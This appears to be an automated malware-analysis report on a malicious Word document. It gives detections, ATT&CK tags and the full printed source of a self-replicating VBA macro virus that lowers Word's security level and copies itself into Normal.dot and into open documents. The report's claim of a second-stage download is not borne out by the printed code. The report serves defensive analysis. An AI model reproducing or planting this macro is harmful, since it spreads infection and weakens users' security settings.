MALICIOUS
180
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros, specifically a Document_Open macro designed to execute malicious code. The ClamAV detections indicate it is a known trojan. The macro attempts to modify security settings and likely downloads a second-stage payload, although the exact URL is obfuscated within the script.
Heuristics 3
-
ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.Psycho-3
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10080 bytes |
SHA-256: 529a7f75eaaf42877e9686a1d047457d04fbb8e2feea96e26f1f7666bf05103b |
|||
|
Detection
ClamAV:
Win.Trojan.wmvg-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThissDocument"
Attribute VB_Base = "1Normal.ThissDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Dim Response
' Если ты читаешь эти строки, значит ты уже немного шаришь
' в макросах, и это есть хорошо. Ты спаситель мира, и только
' ты должен разобраться как он работает и удалить Его. Удачи!.
On Error Resume Next
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
'CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
'CommandBars("Tools").Controls("Macro").Enabled = False
'Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)
End If
Set ActDoc = ActiveDocument.VBProject.VBComponents.Item(1)
Set NormTemp = NormalTemplate.VBProject.VBComponents.Item(1)
NTColLn = NormTemp.CodeModule.CountOfLines
ADColLn = ActDoc.CodeModule.CountOfLines
BGN = 2
If ActDoc.Name <> "ThissDocument" Or ADColLn < 4 Then DoAD = True
If NormTemp.Name <> "ThissDocument" Or NTColLn < 4 Then DoNT = True
If DoNT <> True And DoAD <> True Then GoTo NoToInfect
'
If DoNT = True Then
NormTemp.Name = "ThissDocument"
If NTColLn > 0 Then NormTemp.CodeModule.DeleteLines 1, NTColLn
Do While ActDoc.CodeModule.Lines(1, 1) = ""
ActDoc.CodeModule.DeleteLines 1
Loop
NormTemp.CodeModule.AddFromString ("Private Sub Document_Close()")
Do While ActDoc.CodeModule.Lines(BGN, 1) <> ""
NormTemp.CodeModule.InsertLines BGN, ActDoc.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
'
Response = MsgBox("Дембель неизбежен?", vbYesNo, vbDefaultButton2, "ДМБ-2002")
If Response = vbYes Then
GoTo NoToInfect
Else
If DoAD = True Then
ActDoc.Name = "ThissDocument"
If ADColLn > 0 Then ActDoc.CodeModule.DeleteLines 1, ADColLn
Do While NormTemp.CodeModule.Lines(1, 1) = ""
NormTemp.CodeModule.DeleteLines 1
Loop
ActDoc.CodeModule.AddFromString ("Private Sub Document_Open()")
Do While NormTemp.CodeModule.Lines(BGN, 1) <> ""
ActDoc.CodeModule.InsertLines BGN, NormTemp.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
End If
NoToInfect:
'Destruct
If Year(Now) > 2001 And Rnd > 0.95 Then
Selection.EndKey wdStory
Selection.TypeParagraph
Selection.TypeText "Hi LameR": Selection.TypeParagraph
Selection.TypeText "The Extremist has you..": Selection.TypeParagraph
Selection.LanguageID = wdRussian
End If
'
If NTColLn <> 0 And ADColLn = 0 And (InStr(1, ActiveDocument.Name, "Документ") = False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Документ") = True) Then
ActiveDocument.Saved = True: End If
End Sub
' Processing file: /opt/analyzer/scan_staging/905d35b6a8614720ba568537a5d3745d.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThissDocument - 5182 bytes
' Line #0:
' FuncDefn (Private Sub Document_Open())
' Line #1:
' Dim
' VarDefn Response
' Line #2:
' QuoteRem 0x0000 0x0039 " Если ты читаешь эти строки, значит ты уже немного шаришь"
' Line #3:
' QuoteRem 0x0000 0x003C " в макросах, и это есть хорошо. Ты спаситель мира, и только"
' Line #4:
' QuoteRem 0x0000 0x003D " ты должен разобраться как он работает и удалить Его. Удачи!."
' Line #5:
' OnError (Resume Next)
' Line #6:
' LitStr 0x0000 ""
' LitStr 0x003D "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security"
' LitStr 0x0005 "Level"
' Ld System
' ArgsMemLd PrivateProfileString 0x0003
' LitStr 0x0000 ""
' Ne
' IfBlock
' Line #7:
' QuoteRem 0x0000 0x003C "CommandBars("Macro").Controls("Security...").Enabled = False"
' Line #8:
' LitDI4 0x0001 0x0000
' LitStr 0x0000 ""
' LitStr 0x003D "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security"
' LitStr 0x0005 "Level"
' Ld System
' ArgsMemSt PrivateProfil
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.